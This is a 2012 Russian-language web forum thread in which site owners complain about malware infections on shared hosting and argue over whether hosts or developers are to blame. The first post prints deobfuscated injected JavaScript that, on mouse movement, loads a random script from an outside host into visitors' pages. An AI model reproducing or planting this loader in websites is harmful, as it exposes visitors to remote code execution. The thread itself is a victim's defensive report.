Форум на Kuban.ru - Осторожно

Форум на Kuban.ru (http://forums.kuban.ru/)

- Веб-дизайн и программирование (http://forums.kuban.ru/f1030/)

- - Осторожно - MasterHost. (вирусы) (http://forums.kuban.ru/f1030/ostorozhno_-_masterhost_virusy-2362572.html)

Kuba	19.03.2012 13:27

Осторожно - MasterHost. (вирусы)

Есть кто хостится на Masterhost ??

за последние 2 месяуа задолбался вычищать вирусы с сайтов.

5 случаев заражения на разных площадках. причем на последнюю больше 2х месяцев никто не заходил ни по ФТП ни в админку сайта.

Вируc заражает *.js файлы, добавляя в конец каждого вредоносный обфусцированный код. при раскодировании кода получается следущее

function() ** var url = 'http://stixbktguw.from-wy.com/g/';
if (typeof window.xyzflag === 'undefined') ** window.xyzflag = 0; **
document.onmousemove = function() **
if (window.xyzflag === 0) **
window.xyzflag = 1;
var head = document.getElementsByTagName('head')[0];
var script = document.createElement('script');
script.type = 'text/javascript';
script.onreadystatechange = function () **
if (this.readyState == 'complete') ** window.xyzflag = 2;
**;
script.onload = function() **
window.xyzflag = 2; **; script.src = url + Math.random().toString().substring(3) + '.js'; head.appendChild(script); ** **;
**)();

То есть на страницы подгужается случайный файл с кодом.
зараженные файлы увеличиватюся на 12 кб.

До этого были случи заражения другим вирусом, который дописывал iframe со своим кодом в конец всех индексных страниц. (index.* main.*) независимо от расширения файла

Гламурный Креведко

19.03.2012 15:02

Ну так может у тебя шелл залит?

Kuba	19.03.2012 15:14

пока не нашел. И если на 2 сайта я допускаю проникновение через троянов на моей машине, то три других сайта полность исключаю, не коннектился по фтп долгое время, а опасность пошла недавно.

Kuba	19.03.2012 15:16

Да и не один я жалуюсь, почитайте отзывы о данном Хостере. Они вообще не проверят свои площадки антивирусом, как написано в их ФАКьЮ

repair

20.03.2012 09:49

Видимо дыра где то у хостера. У меня на зеноне тож было как-то, неделю вирусней заражались все сайты. Из _полумер_ - прикрыл на запись файло, перестало. Пока сам хостер не сподобился дыру закрыть - так и ломились. А где она была - х.з. молчат партизаны.

profi

22.03.2012 17:35

дырка очень простая.. у них php работает по умолчанию nobody, если у тебя папки где-то стоят права 777, вот тебе и дырка для захода с другого аккаунта.

Kuba	22.03.2012 17:45

6-profi >Ну да, есть папочка public, Есть способ прикрыть лазейку ??

АВИ®	25.03.2012 21:05

Аналогичная хрень на Агаве...
От чистого сердца: не покупайте этот хост!!!

cv	26.03.2012 07:05

много проектов на Агаве и на мастерхосте, никаких проблем нет, проблема не в хостерах, а либо кривых руках разработчиков, которые даже не соизволят посмотреть логи веб серверов и FTP серверов и узнать каким образом к ним попало постороннее, либо, как говорят системные администраторы "Порно сайты" - в которых полно троянов, ворующих пароли от FTP в частности.

АВИ®	27.03.2012 16:34

[quote=cv;24180125] много проектов на Агаве и на мастерхосте, никаких проблем нет, проблема не в хостерах, а либо кривых руках разработчиков, которые даже не соизволят посмотреть логи веб серверов и FTP серверов и узнать каким образом к ним попало постороннее, либо, как говорят системные администраторы "Порно сайты" - в которых полно троянов, ворующих пароли от FTP в частности. [/quote]

Т.е. заплатив за хостинг, я еще обязан постоянно смотреть логи, менять пароли фтп итд?!
Может ну его на такие хосты?
Кстати, Агава даже не удосуживается создать у себя на виртуальном сервере папку логов. Это должен делать пользователь хоста.

Kuba	27.03.2012 16:37

МастерХост не предоставляет логи доступа к ФТП. Когда просил, они мне только сказали, что вирус загружен по фтп такого то числа с такого то ИП. IP этот они заблокировали, и все.

cv	27.03.2012 20:07

[quote=АВИ®;24219506] Цитата: Сообщение от cv много проектов на Агаве и на мастерхосте, никаких проблем нет, проблема не в хостерах, а либо кривых руках разработчиков, которые даже не соизволят посмотреть логи веб серверов и FTP серверов и узнать каким образом к ним попало постороннее, либо, как говорят системные администраторы "Порно сайты" - в которых полно троянов, ворующих пароли от FTP в частности. Т.е. заплатив за хостинг, я еще обязан постоянно смотреть логи, менять пароли фтп итд?! Может ну его на такие хосты? Кстати, Агава даже не удосуживается создать у себя на виртуальном сервере папку логов. Это должен делать пользователь хоста. [/quote]
Вы считаете что сделав дырявые скрипты и разместив их проблема хостера, а не ваша?
Вообще-то нужно следить за работой своих творений путем просмотра хоть с какой-то периодичностью, лучше журналов пока еще ничего не придумали.

Kuba	27.03.2012 21:16

12-cv > в этом полностью согласен

lamerok

27.03.2012 22:04

[quote=АВИ®;24219506]Т.е. заплатив за хостинг, я еще обязан постоянно смотреть логи, менять пароли фтп итд?! Может ну его на такие хосты? Кстати, Агава даже не удосуживается создать у себя на виртуальном сервере папку логов. Это должен делать пользователь хоста. [/quote]
не смотрите
тока тада какие притензии?
если юзер криво настраивает свои скрипты - то причем тут хостер?
а если у юзера пароли стянули через какую-нить хрень - тоже хостер виноват?

lamerok

27.03.2012 22:11

ну и менять пароли конечно не надо, пусть легкие или дефолтные стоят ...
ЗЫ
как мне надоели постоянные письма банилки ссш ...
ломятся постоянно ...
а за юзера никто из хостеров просто так следить за его хозяйством не будет
например, я могу себе или по просьбе клиента настроить банилку по той же 404 , но за ней следить надо, а то может и полезное побанить

Текущее время: 12:11. Часовой пояс GMT +3.